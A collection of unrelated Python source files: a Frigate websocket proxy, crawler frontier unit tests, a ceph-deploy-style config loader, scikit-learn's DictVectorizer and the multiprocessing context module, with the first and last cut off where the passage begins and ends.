full_path = self._create_path(**kwargs)
if not full_path:
return web.Response(status=HTTPStatus.NOT_FOUND)
req_protocols = []
if hdrs.SEC_WEBSOCKET_PROTOCOL in request.headers:
req_protocols = [
str(proto.strip())
for proto in request.headers[hdrs.SEC_WEBSOCKET_PROTOCOL].split(",")
]
ws_to_user = web.WebSocketResponse(
protocols=req_protocols, autoclose=False, autoping=False
)
await ws_to_user.prepare(request)
# Preparing
url = str(URL(config_entry.data[CONF_URL]) / full_path)
source_header = _init_header(request)
# Support GET query
if request.query_string:
url = f"{url}?{request.query_string}"
async with self._websession.ws_connect(
url,
headers=source_header,
protocols=req_protocols,
autoclose=False,
autoping=False,
) as ws_to_frigate:
await asyncio.wait(
[
self._proxy_msgs(ws_to_frigate, ws_to_user),
self._proxy_msgs(ws_to_user, ws_to_frigate),
],
return_when=asyncio.tasks.FIRST_COMPLETED,
)
return ws_to_user
class JSMPEGProxyView(WebsocketProxyView):
"""A proxy for JSMPEG websocket."""
url = "/api/frigate/{frigate_instance_id:.+}/jsmpeg/{path:.+}"
extra_urls = ["/api/frigate/jsmpeg/{path:.+}"]
name = "api:frigate:jsmpeg"
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
return f"live/{kwargs['path']}"
def _init_header(request: web.Request) -> CIMultiDict | dict[str, str]:
"""Create initial header."""
headers = {}
# filter flags
for name, value in request.headers.items():
if name in (
hdrs.CONTENT_LENGTH,
hdrs.CONTENT_ENCODING,
hdrs.SEC_WEBSOCKET_EXTENSIONS,
hdrs.SEC_WEBSOCKET_PROTOCOL,
hdrs.SEC_WEBSOCKET_VERSION,
hdrs.SEC_WEBSOCKET_KEY,
hdrs.HOST,
):
continue
headers[name] = value
# Set X-Forwarded-For
forward_for = request.headers.get(hdrs.X_FORWARDED_FOR)
assert request.transport
connected_ip = ip_address(request.transport.get_extra_info("peername")[0])
if forward_for:
forward_for = f"{forward_for}, {connected_ip!s}"
else:
forward_for = f"{connected_ip!s}"
headers[hdrs.X_FORWARDED_FOR] = forward_for
# Set X-Forwarded-Host
forward_host = request.headers.get(hdrs.X_FORWARDED_HOST)
if not forward_host:
forward_host = request.host
headers[hdrs.X_FORWARDED_HOST] = forward_host
# Set X-Forwarded-Proto
forward_proto = request.headers.get(hdrs.X_FORWARDED_PROTO)
if not forward_proto:
forward_proto = request.url.scheme
headers[hdrs.X_FORWARDED_PROTO] = forward_proto
return headers
def _response_header(response: aiohttp.ClientResponse) -> dict[str, str]:
"""Create response header."""
headers = {}
for name, value in response.headers.items():
if name in (
hdrs.TRANSFER_ENCODING,
# Removing Content-Length header for streaming responses
# prevents seeking from working for mp4 files
# hdrs.CONTENT_LENGTH,
hdrs.CONTENT_TYPE,
hdrs.CONTENT_ENCODING,
):
continue
headers[name] = value
return headers
|
|
#
# Copyright (c) 2011 Daniel Truemper [email protected]
#
# test_frontier.py 27-Jan-2011
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from logging import StreamHandler
import time
from datetime import datetime, timedelta
import unittest
import sys
from spyder.core.constants import *
from spyder.core.frontier import *
from spyder.time import serialize_date_time, deserialize_date_time
from spyder.core.prioritizer import SimpleTimestampPrioritizer
from spyder.core.settings import Settings
from spyder.core.sink import AbstractCrawlUriSink
from spyder.core.sqlitequeues import SQLiteSingleHostUriQueue
from spyder.thrift.gen.ttypes import CrawlUri
class BaseFrontierTest(unittest.TestCase):
def test_adding_uri_works(self):
now = datetime(*datetime.fromtimestamp(time.time()).timetuple()[0:6])
next_crawl_date = now + timedelta(days=1)
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
curi = CrawlUri("http://localhost")
curi.rep_header = { "Etag" : "123", "Date" : serialize_date_time(now) }
curi.current_priority = 2
frontier = AbstractBaseFrontier(s, StreamHandler(sys.stdout),
SQLiteSingleHostUriQueue(s.FRONTIER_STATE_FILE),
SimpleTimestampPrioritizer(s))
frontier.add_uri(curi)
for uri in frontier._front_end_queues.queue_head():
(url, etag, mod_date, queue, next_date) = uri
self.assertEqual("http://localhost", url)
self.assertEqual("123", etag)
self.assertEqual(now, datetime.fromtimestamp(mod_date))
frontier._current_uris[url] = uri
def test_crawluri_from_uri(self):
now = datetime(*datetime.fromtimestamp(time.time()).timetuple()[0:6])
now_timestamp = time.mktime(now.timetuple())
next_crawl_date = now + timedelta(days=1)
next_crawl_date_timestamp = time.mktime(next_crawl_date.timetuple())
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
frontier = AbstractBaseFrontier(s, StreamHandler(sys.stdout),
SQLiteSingleHostUriQueue(s.FRONTIER_STATE_FILE),
SimpleTimestampPrioritizer(s))
uri = ("http://localhost", "123", now_timestamp, 1,
next_crawl_date_timestamp)
curi = frontier._crawluri_from_uri(uri)
self.assertEqual("http://localhost", curi.url)
self.assertEqual("123", curi.req_header["Etag"])
self.assertEqual(serialize_date_time(now), curi.req_header["Last-Modified"])
def test_crawluri_from_uri_with_credentials(self):
now = datetime(*datetime.fromtimestamp(time.time()).timetuple()[0:6])
now_timestamp = time.mktime(now.timetuple())
next_crawl_date = now + timedelta(days=1)
next_crawl_date_timestamp = time.mktime(next_crawl_date.timetuple())
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
frontier = AbstractBaseFrontier(s, StreamHandler(sys.stdout),
SQLiteSingleHostUriQueue(s.FRONTIER_STATE_FILE),
SimpleTimestampPrioritizer(s))
uri = ("http://user:passwd@localhost", "123", now_timestamp, 1,
next_crawl_date_timestamp)
curi = frontier._crawluri_from_uri(uri)
self.assertEqual("http://user:passwd@localhost", curi.url)
self.assertEqual("123", curi.req_header["Etag"])
self.assertEqual(serialize_date_time(now),
curi.req_header["Last-Modified"])
self.assertEqual("user", curi.optional_vars[CURI_SITE_USERNAME])
self.assertEqual("passwd", curi.optional_vars[CURI_SITE_PASSWORD])
def test_sinks(self):
now = datetime(*datetime.fromtimestamp(time.time()).timetuple()[0:6])
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
frontier = AbstractBaseFrontier(s, StreamHandler(sys.stdout),
SQLiteSingleHostUriQueue(s.FRONTIER_STATE_FILE),
SimpleTimestampPrioritizer(s))
frontier.add_sink(AbstractCrawlUriSink())
curi = CrawlUri("http://localhost")
curi.rep_header = { "Etag" : "123", "Date" : serialize_date_time(now) }
curi.current_priority = 2
frontier._add_to_heap(frontier._uri_from_curi(curi), 0)
frontier.process_successful_crawl(curi)
frontier._add_to_heap(frontier._uri_from_curi(curi), 0)
frontier.process_not_found(curi)
frontier._add_to_heap(frontier._uri_from_curi(curi), 0)
frontier.process_redirect(curi)
frontier._add_to_heap(frontier._uri_from_curi(curi), 0)
frontier.process_server_error(curi)
class SingleHostFrontierTest(unittest.TestCase):
def test_that_updating_heap_works(self):
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
frontier = SingleHostFrontier(s, StreamHandler(sys.stdout))
q1 = []
q2 = []
now = datetime(*datetime.fromtimestamp(
time.time()).timetuple()[0:6]) - timedelta(days=2)
for i in range(1, 20):
curi = CrawlUri("http://localhost/test/%s" % i)
curi.current_priority = (i % 2 + 1)
curi.rep_header = { "Etag" : "123%s" % i, "Date" : serialize_date_time(now) }
frontier.add_uri(curi)
if i % 2 == 0:
(url, etag, mod_date, next_date, prio) = frontier._uri_from_curi(curi)
next_date = next_date - 1000 * 60 * 5
frontier._front_end_queues.update_uri((url, etag, mod_date,
next_date, prio))
q2.append(curi.url)
else:
q1.append(curi.url)
self.assertRaises(Empty, frontier._heap.get_nowait)
for i in range(1, 10):
frontier._next_possible_crawl = time.time()
candidate_uri = frontier.get_next()
if candidate_uri.url in q1:
self.assertTrue(candidate_uri.url in q1)
q1.remove(candidate_uri.url)
elif candidate_uri.url in q2:
self.assertTrue(candidate_uri.url in q2)
q2.remove(candidate_uri.url)
self.assertEqual(10, len(q1))
self.assertEqual(0, len(q2))
self.assertRaises(Empty, frontier.get_next)
def test_that_time_based_politeness_works(self):
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
frontier = SingleHostFrontier(s, StreamHandler(sys.stdout))
now = datetime(*datetime.fromtimestamp(
time.time()).timetuple()[0:6]) - timedelta(days=2)
curi = CrawlUri("http://localhost/test")
curi.current_priority = 3
curi.rep_header = { "Etag" : "123", "Date" : serialize_date_time(now) }
curi.req_time = 0.5
frontier._add_to_heap(frontier._uri_from_curi(curi), 0)
a = frontier._next_possible_crawl
frontier.process_successful_crawl(curi)
self.assertTrue(frontier._next_possible_crawl > a)
self.assertTrue(frontier._next_possible_crawl > time.time())
self.assertRaises(Empty, frontier.get_next)
if __name__ == '__main__':
unittest.main()
|
|
from ConfigParser import SafeConfigParser, NoSectionError, NoOptionError
import logging
import os
from os import path
import re
from megdc.util.paths import gpg
logger = logging.getLogger('ceph_deploy.conf')
cd_conf_template = """
#
# ceph-deploy configuration file
#
[ceph-deploy-global]
# Overrides for some of ceph-deploy's global flags, like verbosity or cluster
# name
[ceph-deploy-install]
# Overrides for some of ceph-deploy's install flags, like version of ceph to
# install
#
# Repositories section
#
# yum repos:
# [myrepo]
# baseurl = https://user:[email protected]/rhel6
# gpgurl = https://example.org/keys/release.asc
# default = True
# extra-repos = cephrepo # will install the cephrepo file too
#
# [cephrepo]
# name=ceph repo noarch packages
# baseurl=http://ceph.com/rpm-emperor/el6/noarch
# enabled=1
# gpgcheck=1
# type=rpm-md
# gpgkey={gpgurl}
# apt repos:
# [myrepo]
# baseurl = https://user:[email protected]/
# gpgurl = https://example.org/keys/release.asc
# default = True
# extra-repos = cephrepo # will install the cephrepo file too
#
# [cephrepo]
# baseurl=http://ceph.com/rpm-emperor/el6/noarch
# gpgkey={gpgurl}
""".format(gpgurl=gpg.url('release'))
def location():
"""
Find and return the location of the ceph-deploy configuration file. If this
file does not exist, create one in a default location.
"""
return _locate_or_create()
def load():
parser = Conf()
parser.read(location())
return parser
def _locate_or_create():
home_config = path.expanduser('~/.megdc.conf')
# With order of importance
locations = [
path.join(os.getcwd(), 'megdc.conf'),
home_config,
]
for location in locations:
if path.exists(location):
logger.debug('found configuration file at: %s' % location)
return location
logger.info('could not find configuration file, will create one in $HOME')
create_stub(home_config)
return home_config
def create_stub(_path=None):
_path = _path or path.expanduser('~/.cephdeploy.conf')
logger.debug('creating new configuration file: %s' % _path)
with open(_path, 'w') as cd_conf:
cd_conf.write(cd_conf_template)
def set_overrides(args, _conf=None):
"""
Read the configuration file and look for ceph-deploy sections
to set flags/defaults from the values found. This will alter the
``args`` object that is created by argparse.
"""
# Get the subcommand name to avoid overwritting values from other
# subcommands that are not going to be used
subcommand = args.func.__name__
command_section = 'ceph-deploy-%s' % subcommand
conf = _conf or load()
for section_name in conf.sections():
if section_name in ['ceph-deploy-global', command_section]:
override_subcommand(
section_name,
conf.items(section_name),
args
)
return args
def override_subcommand(section_name, section_items, args):
"""
Given a specific section in the configuration file that maps to
a subcommand (except for the global section) read all the keys that are
actual argument flags and slap the values for that one subcommand.
Return the altered ``args`` object at the end.
"""
# XXX We are not coercing here any int-like values, so if ArgParse
# does that in the CLI we are totally non-compliant with that expectation
# but we will try and infer a few boolean values
# acceptable boolean states for flags
_boolean_states = {'yes': True, 'true': True, 'on': True,
'no': False, 'false': False, 'off': False}
for k, v, in section_items:
# get the lower case value of `v`, fallback to the booleanized
# (original) value of `v`
try:
normalized_value = v.lower()
except AttributeError:
# probably not a string object that has .lower
normalized_value = v
value = _boolean_states.get(normalized_value, v)
setattr(args, k, value)
return args
class Conf(SafeConfigParser):
"""
Subclasses from SafeConfigParser to give a few helpers for the ceph-deploy
configuration. Specifically, it addresses the need to work with custom
sections that signal the usage of custom repositories.
"""
reserved_sections = ['ceph-deploy-global', 'ceph-deploy-install']
def get_safe(self, section, key, default=None):
"""
Attempt to get a configuration value from a certain section
in a ``cfg`` object but returning None if not found. Avoids the need
to be doing try/except {ConfigParser Exceptions} every time.
"""
try:
return self.get(section, key)
except (NoSectionError, NoOptionError):
return default
def get_repos(self):
"""
Return all the repo sections from the config, excluding the ceph-deploy
reserved sections.
"""
return [
section for section in self.sections()
if section not in self.reserved_sections
]
@property
def has_repos(self):
"""
boolean to reflect having (or not) any repository sections
"""
for section in self.sections():
if section not in self.reserved_sections:
return True
return False
def get_list(self, section, key):
"""
Assumes that the value for a given key is going to be a list
separated by commas. It gets rid of trailing comments.
If just one item is present it returns a list with a single item, if no
key is found an empty list is returned.
"""
value = self.get_safe(section, key, [])
if value == []:
return value
# strip comments
value = re.split(r'\s+#', value)[0]
# split on commas
value = value.split(',')
# strip spaces
return [x.strip() for x in value]
def get_default_repo(self):
"""
Go through all the repositories defined in the config file and search
for a truthy value for the ``default`` key. If there isn't any return
None.
"""
for repo in self.get_repos():
if self.get_safe(repo, 'default') and self.getboolean(repo, 'default'):
return repo
return False
|
|
# Authors: Lars Buitinck
# Dan Blanchard <[email protected]>
# License: BSD 3 clause
from array import array
from collections.abc import Mapping, Iterable
from operator import itemgetter
from numbers import Number
import numpy as np
import scipy.sparse as sp
from ..base import BaseEstimator, TransformerMixin
from ..utils import check_array, tosequence
from ..utils.deprecation import deprecated
def _tosequence(X):
"""Turn X into a sequence or ndarray, avoiding a copy if possible."""
if isinstance(X, Mapping): # single sample
return [X]
else:
return tosequence(X)
class DictVectorizer(TransformerMixin, BaseEstimator):
"""Transforms lists of feature-value mappings to vectors.
This transformer turns lists of mappings (dict-like objects) of feature
names to feature values into Numpy arrays or scipy.sparse matrices for use
with scikit-learn estimators.
When feature values are strings, this transformer will do a binary one-hot
(aka one-of-K) coding: one boolean-valued feature is constructed for each
of the possible string values that the feature can take on. For instance,
a feature "f" that can take on the values "ham" and "spam" will become two
features in the output, one signifying "f=ham", the other "f=spam".
If a feature value is a sequence or set of strings, this transformer
will iterate over the values and will count the occurrences of each string
value.
However, note that this transformer will only do a binary one-hot encoding
when feature values are of type string. If categorical features are
represented as numeric values such as int or iterables of strings, the
DictVectorizer can be followed by
:class:`~sklearn.preprocessing.OneHotEncoder` to complete
binary one-hot encoding.
Features that do not occur in a sample (mapping) will have a zero value
in the resulting array/matrix.
Read more in the :ref:`User Guide <dict_feature_extraction>`.
Parameters
----------
dtype : dtype, default=np.float64
The type of feature values. Passed to Numpy array/scipy.sparse matrix
constructors as the dtype argument.
separator : str, default="="
Separator string used when constructing new features for one-hot
coding.
sparse : bool, default=True
Whether transform should produce scipy.sparse matrices.
sort : bool, default=True
Whether ``feature_names_`` and ``vocabulary_`` should be
sorted when fitting.
Attributes
----------
vocabulary_ : dict
A dictionary mapping feature names to feature indices.
feature_names_ : list
A list of length n_features containing the feature names (e.g., "f=ham"
and "f=spam").
See Also
--------
FeatureHasher : Performs vectorization using only a hash function.
sklearn.preprocessing.OrdinalEncoder : Handles nominal/categorical
features encoded as columns of arbitrary data types.
Examples
--------
>>> from sklearn.feature_extraction import DictVectorizer
>>> v = DictVectorizer(sparse=False)
>>> D = [{'foo': 1, 'bar': 2}, {'foo': 3, 'baz': 1}]
>>> X = v.fit_transform(D)
>>> X
array([[2., 0., 1.],
[0., 1., 3.]])
>>> v.inverse_transform(X) == [{'bar': 2.0, 'foo': 1.0},
... {'baz': 1.0, 'foo': 3.0}]
True
>>> v.transform({'foo': 4, 'unseen_feature': 3})
array([[0., 0., 4.]])
"""
def __init__(self, *, dtype=np.float64, separator="=", sparse=True, sort=True):
self.dtype = dtype
self.separator = separator
self.sparse = sparse
self.sort = sort
def _add_iterable_element(
self,
f,
v,
feature_names,
vocab,
*,
fitting=True,
transforming=False,
indices=None,
values=None,
):
"""Add feature names for iterable of strings"""
for vv in v:
if isinstance(vv, str):
feature_name = "%s%s%s" % (f, self.separator, vv)
vv = 1
else:
raise TypeError(
f"Unsupported type {type(vv)} in iterable "
"value. Only iterables of string are "
"supported."
)
if fitting and feature_name not in vocab:
vocab[feature_name] = len(feature_names)
feature_names.append(feature_name)
if transforming and feature_name in vocab:
indices.append(vocab[feature_name])
values.append(self.dtype(vv))
def fit(self, X, y=None):
"""Learn a list of feature name -> indices mappings.
Parameters
----------
X : Mapping or iterable over Mappings
Dict(s) or Mapping(s) from feature names (arbitrary Python
objects) to feature values (strings or convertible to dtype).
.. versionchanged:: 0.24
Accepts multiple string values for one categorical feature.
y : (ignored)
Ignored parameter.
Returns
-------
self : object
DictVectorizer class instance.
"""
feature_names = []
vocab = {}
for x in X:
for f, v in x.items():
if isinstance(v, str):
feature_name = "%s%s%s" % (f, self.separator, v)
v = 1
elif isinstance(v, Number) or (v is None):
feature_name = f
elif isinstance(v, Mapping):
raise TypeError(
f"Unsupported value type {type(v)} "
f"for {f}: {v}.\n"
"Mapping objects are not supported."
)
elif isinstance(v, Iterable):
feature_name = None
self._add_iterable_element(f, v, feature_names, vocab)
if feature_name is not None:
if feature_name not in vocab:
vocab[feature_name] = len(feature_names)
feature_names.append(feature_name)
if self.sort:
feature_names.sort()
vocab = {f: i for i, f in enumerate(feature_names)}
self.feature_names_ = feature_names
self.vocabulary_ = vocab
return self
def _transform(self, X, fitting):
# Sanity check: Python's array has no way of explicitly requesting the
# signed 32-bit integers that scipy.sparse needs, so we use the next
# best thing: typecode "i" (int). However, if that gives larger or
# smaller integers than 32-bit ones, np.frombuffer screws up.
assert array("i").itemsize == 4, (
"sizeof(int) != 4 on your platform; please report this at"
" https://github.com/scikit-learn/scikit-learn/issues and"
" include the output from platform.platform() in your bug report"
)
dtype = self.dtype
if fitting:
feature_names = []
vocab = {}
else:
feature_names = self.feature_names_
vocab = self.vocabulary_
transforming = True
# Process everything as sparse regardless of setting
X = [X] if isinstance(X, Mapping) else X
indices = array("i")
indptr = [0]
# XXX we could change values to an array.array as well, but it
# would require (heuristic) conversion of dtype to typecode...
values = []
# collect all the possible feature names and build sparse matrix at
# same time
for x in X:
for f, v in x.items():
if isinstance(v, str):
feature_name = "%s%s%s" % (f, self.separator, v)
v = 1
elif isinstance(v, Number) or (v is None):
feature_name = f
elif not isinstance(v, Mapping) and isinstance(v, Iterable):
feature_name = None
self._add_iterable_element(
f,
v,
feature_names,
vocab,
fitting=fitting,
transforming=transforming,
indices=indices,
values=values,
)
else:
raise TypeError(
f"Unsupported value Type {type(v)} "
f"for {f}: {v}.\n"
f"{type(v)} objects are not supported."
)
if feature_name is not None:
if fitting and feature_name not in vocab:
vocab[feature_name] = len(feature_names)
feature_names.append(feature_name)
if feature_name in vocab:
indices.append(vocab[feature_name])
values.append(self.dtype(v))
indptr.append(len(indices))
if len(indptr) == 1:
raise ValueError("Sample sequence X is empty.")
indices = np.frombuffer(indices, dtype=np.intc)
shape = (len(indptr) - 1, len(vocab))
result_matrix = sp.csr_matrix(
(values, indices, indptr), shape=shape, dtype=dtype
)
# Sort everything if asked
if fitting and self.sort:
feature_names.sort()
map_index = np.empty(len(feature_names), dtype=np.int32)
for new_val, f in enumerate(feature_names):
map_index[new_val] = vocab[f]
vocab[f] = new_val
result_matrix = result_matrix[:, map_index]
if self.sparse:
result_matrix.sort_indices()
else:
result_matrix = result_matrix.toarray()
if fitting:
self.feature_names_ = feature_names
self.vocabulary_ = vocab
return result_matrix
def fit_transform(self, X, y=None):
"""Learn a list of feature name -> indices mappings and transform X.
Like fit(X) followed by transform(X), but does not require
materializing X in memory.
Parameters
----------
X : Mapping or iterable over Mappings
Dict(s) or Mapping(s) from feature names (arbitrary Python
objects) to feature values (strings or convertible to dtype).
.. versionchanged:: 0.24
Accepts multiple string values for one categorical feature.
y : (ignored)
Ignored parameter.
Returns
-------
Xa : {array, sparse matrix}
Feature vectors; always 2-d.
"""
return self._transform(X, fitting=True)
def inverse_transform(self, X, dict_type=dict):
"""Transform array or sparse matrix X back to feature mappings.
X must have been produced by this DictVectorizer's transform or
fit_transform method; it may only have passed through transformers
that preserve the number of features and their order.
In the case of one-hot/one-of-K coding, the constructed feature
names and values are returned rather than the original ones.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Sample matrix.
dict_type : type, default=dict
Constructor for feature mappings. Must conform to the
collections.Mapping API.
Returns
-------
D : list of dict_type objects of shape (n_samples,)
Feature mappings for the samples in X.
"""
# COO matrix is not subscriptable
X = check_array(X, accept_sparse=["csr", "csc"])
n_samples = X.shape[0]
names = self.feature_names_
dicts = [dict_type() for _ in range(n_samples)]
if sp.issparse(X):
for i, j in zip(*X.nonzero()):
dicts[i][names[j]] = X[i, j]
else:
for i, d in enumerate(dicts):
for j, v in enumerate(X[i, :]):
if v != 0:
d[names[j]] = X[i, j]
return dicts
def transform(self, X):
"""Transform feature->value dicts to array or sparse matrix.
Named features not encountered during fit or fit_transform will be
silently ignored.
Parameters
----------
X : Mapping or iterable over Mappings of shape (n_samples,)
Dict(s) or Mapping(s) from feature names (arbitrary Python
objects) to feature values (strings or convertible to dtype).
Returns
-------
Xa : {array, sparse matrix}
Feature vectors; always 2-d.
"""
return self._transform(X, fitting=False)
@deprecated(
"get_feature_names is deprecated in 1.0 and will be removed "
"in 1.2. Please use get_feature_names_out instead."
)
def get_feature_names(self):
"""Return a list of feature names, ordered by their indices.
If one-of-K coding is applied to categorical features, this will
include the constructed feature names but not the original ones.
Returns
-------
feature_names_ : list of length (n_features,)
List containing the feature names (e.g., "f=ham" and "f=spam").
"""
return self.feature_names_
def get_feature_names_out(self, input_features=None):
"""Get output feature names for transformation.
Parameters
----------
input_features : array-like of str or None, default=None
Not used, present here for API consistency by convention.
Returns
-------
feature_names_out : ndarray of str objects
Transformed feature names.
"""
if any(not isinstance(name, str) for name in self.feature_names_):
feature_names = [str(name) for name in self.feature_names_]
else:
feature_names = self.feature_names_
return np.asarray(feature_names, dtype=object)
def restrict(self, support, indices=False):
"""Restrict the features to those in support using feature selection.
This function modifies the estimator in-place.
Parameters
----------
support : array-like
Boolean mask or list of indices (as returned by the get_support
member of feature selectors).
indices : bool, default=False
Whether support is a list of indices.
Returns
-------
self : object
DictVectorizer class instance.
Examples
--------
>>> from sklearn.feature_extraction import DictVectorizer
>>> from sklearn.feature_selection import SelectKBest, chi2
>>> v = DictVectorizer()
>>> D = [{'foo': 1, 'bar': 2}, {'foo': 3, 'baz': 1}]
>>> X = v.fit_transform(D)
>>> support = SelectKBest(chi2, k=2).fit(X, [0, 1])
>>> v.get_feature_names_out()
array(['bar', 'baz', 'foo'], ...)
>>> v.restrict(support.get_support())
DictVectorizer()
>>> v.get_feature_names_out()
array(['bar', 'foo'], ...)
"""
if not indices:
support = np.where(support)[0]
names = self.feature_names_
new_vocab = {}
for i in support:
new_vocab[names[i]] = len(new_vocab)
self.vocabulary_ = new_vocab
self.feature_names_ = [
f for f, i in sorted(new_vocab.items(), key=itemgetter(1))
]
return self
def _more_tags(self):
return {"X_types": ["dict"]}
|
|
import os
import sys
import threading
from . import process
from . import reduction
__all__ = [] # things are copied from here to __init__.py
#
# Exceptions
#
class ProcessError(Exception):
pass
class BufferTooShort(ProcessError):
pass
class TimeoutError(ProcessError):
pass
class AuthenticationError(ProcessError):
pass
#
# Base type for contexts
#
class BaseContext(object):
ProcessError = ProcessError
BufferTooShort = BufferTooShort
TimeoutError = TimeoutError
AuthenticationError = AuthenticationError
current_process = staticmethod(process.current_process)
active_children = staticmethod(process.active_children)
def cpu_count(self):
'''Returns the number of CPUs in the system'''
num = os.cpu_count()
if num is None:
raise NotImplementedError('cannot determine number of cpus')
else:
return num
def Manager(self):
'''Returns a manager associated with a running server process
The managers methods such as `Lock()`, `Condition()` and `Queue()`
can be used to create shared objects.
'''
from .managers import SyncManager
m = SyncManager(ctx=self.get_context())
m.start()
return m
def Pipe(self, duplex=True):
'''Returns two connection object connected by a pipe'''
from .connection import Pipe
return Pipe(duplex)
def Lock(self):
'''Returns a non-recursive lock object'''
from .synchronize import Lock
return Lock(ctx=self.get_context())
def RLock(self):
'''Returns a recursive lock object'''
from .synchronize import RLock
return RLock(ctx=self.get_context())
def Condition(self, lock=None):
'''Returns a condition object'''
from .synchronize import Condition
return Condition(lock, ctx=self.get_context())
def Semaphore(self, value=1):
'''Returns a semaphore object'''
from .synchronize import Semaphore
return Semaphore(value, ctx=self.get_context())
def BoundedSemaphore(self, value=1):
'''Returns a bounded semaphore object'''
from .synchronize import BoundedSemaphore
return BoundedSemaphore(value, ctx=self.get_context())
def Event(self):
'''Returns an event object'''
from .synchronize import Event
return Event(ctx=self.get_context())
def Barrier(self, parties, action=None, timeout=None):
'''Returns a barrier object'''
from .synchronize import Barrier
return Barrier(parties, action, timeout, ctx=self.get_context())
def Queue(self, maxsize=0):
'''Returns a queue object'''
from .queues import Queue
return Queue(maxsize, ctx=self.get_context())
def JoinableQueue(self, maxsize=0):
'''Returns a queue object'''
from .queues import JoinableQueue
return JoinableQueue(maxsize, ctx=self.get_context())
def SimpleQueue(self):
'''Returns a queue object'''
from .queues import SimpleQueue
return SimpleQueue(ctx=self.get_context())
def Pool(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None):
'''Returns a process pool object'''
from .pool import Pool
return Pool(processes, initializer, initargs, maxtasksperchild,
context=self.get_context())
def RawValue(self, typecode_or_type, *args):
'''Returns a shared object'''
from .sharedctypes import RawValue
return RawValue(typecode_or_type, *args)
def RawArray(self, typecode_or_type, size_or_initializer):
'''Returns a shared array'''
from .sharedctypes import RawArray
return RawArray(typecode_or_type, size_or_initializer)
def Value(self, typecode_or_type, *args, lock=True):
'''Returns a synchronized shared object'''
from .sharedctypes import Value
return Value(typecode_or_type, *args, lock=lock,
ctx=self.get_context())
def Array(self, typecode_or_type, size_or_initializer, *, lock=True):
'''Returns a synchronized shared array'''
from .sharedctypes import Array
return Array(typecode_or_type, size_or_initializer, lock=lock,
ctx=self.get_context())
def freeze_support(self):
'''Check whether this is a fake forked process in a frozen executable.
If so then run code specified by commandline and exit.
'''
if sys.platform == 'win32' and getattr(sys, 'frozen', False):
from .spawn import freeze_support
freeze_support()
def get_logger(self):
'''Return package logger -- if it does not already exist then
it is created.
'''
from .util import get_logger
return get_logger()
def log_to_stderr(self, level=None):
'''Turn on logging and add a handler which prints to stderr'''
from .util import log_to_stderr
return log_to_stderr(level)
def allow_connection_pickling(self):
'''Install support for sending connections and sockets
between processes
'''
# This is undocumented. In previous versions of multiprocessing
# its only effect was to make socket objects inheritable on Windows.
from . import connection
def set_executable(self, executable):
'''Sets the path to a python.exe or pythonw.exe binary used to run
child processes instead of sys.executable when using the 'spawn'
start method. Useful for people embedding Python.
'''
from .spawn import set_executable
set_executable(executable)
def set_forkserver_preload(self, module_names):
'''Set list of module names to try to load in forkserver process.
This is really just a hint.
'''
from .forkserver import set_forkserver_preload
set_forkserver_preload(module_names)
def get_context(self, method=None):
if method is None:
return self
try:
ctx = _concrete_contexts[method]
except KeyError:
raise ValueError('cannot find context for %r' % method)
ctx._check_available()
return ctx
def get_start_method(self, allow_none=False):
return self._name
def set_start_method(self, method=None):
raise ValueError('cannot set start method of concrete context')
@property
def reducer(self):
'''Controls how objects will be reduced to a form that can be
shared with other processes.'''
return globals().get('reduction')
@reducer.setter
def reducer(self, reduction):
globals()['reduction'] = reduction
def _check_available(self):
pass
#
# Type of default context -- underlying context can be set at most once
#
class Process(process.BaseProcess):
_start_method = None
@staticmethod
def _Popen(process_obj):
return _default_context.get_context().Process._Popen(process_obj)
class DefaultContext(BaseContext):
Process = Process
def __init__(self, context):
self._default_context = context
self._actual_context = None
def get_context(self, method=None):
if method is None:
if self._actual_context is None:
self._actual_context = self._default_context
return self._actual_context
else:
return super().get_context(method)
def set_start_method(self, method, force=False):
if self._actual_context is not None and not force:
raise RuntimeError('context has already been set')
if method is None and force:
self._actual_context = None
return
self._actual_context = self.get_context(method)
def get_start_method(self, allow_none=False):
if self._actual_context is None:
if allow_none:
return None
self._actual_context = self._default_context
return self._actual_context._name
def get_all_start_methods(self):
if sys.platform == 'win32':
return ['spawn']
else:
if reduction.HAVE_SEND_HANDLE:
return ['fork', 'spawn', 'forkserver']
else:
return ['fork', 'spawn']
DefaultContext.__all__ = list(x for x in dir(DefaultContext) if x[0] != '_')
#
# Context types for fixed start method
#
if sys.platform != 'win32':
class ForkProcess(process.BaseProcess):
_start_method = 'fork'
@staticmethod
def _Popen(process_obj):
from .popen_fork import Popen
return Popen(process_obj)
class SpawnProcess(process.BaseProcess):
_start_method = 'spawn'
@staticmethod
def _Popen(process_obj):
from .popen_spawn_posix import Popen
return Popen(process_obj)
class ForkServerProcess(process.BaseProcess):
_start_method = 'forkserver'
@staticmethod
def _Popen(process_obj):
from .popen_forkserver import Popen
return Popen(process_obj)
class ForkContext(BaseContext):
_name = 'fork'
Process = ForkProcess
class SpawnContext(BaseContext):
_name = 'spawn'
Process = SpawnProcess
class ForkServerContext(BaseContext):
_name = 'forkserver'
Process = ForkServerProcess
def _check_available(self):
if not reduction.HAVE_SEND_HANDLE:
raise ValueError('forkserver start method not available')
_concrete_contexts = {
'fork': ForkContext(),
'spawn': SpawnContext(),
'forkserver': ForkServerContext(),
}
_default_context = DefaultContext(_concrete_contexts['fork'])
else:
class SpawnProcess(process.BaseProcess):
_start_method = 'spawn'
@staticmethod
def _Popen(process_obj):
from .popen_spawn_win32 import Popen
return Popen(process_obj)
class SpawnContext(BaseContext):
_name = 'spawn'
Process = SpawnProcess
_concrete_contexts = {
'spawn': SpawnContext(),
}
_default_context = DefaultContext(_concrete_contexts['spawn'])
#
# Force the start method
#
def _force_start_method(method):
_default_context._actual_context = _concrete_contexts[method]
#
# Check that the current thread is spawning a child process
#
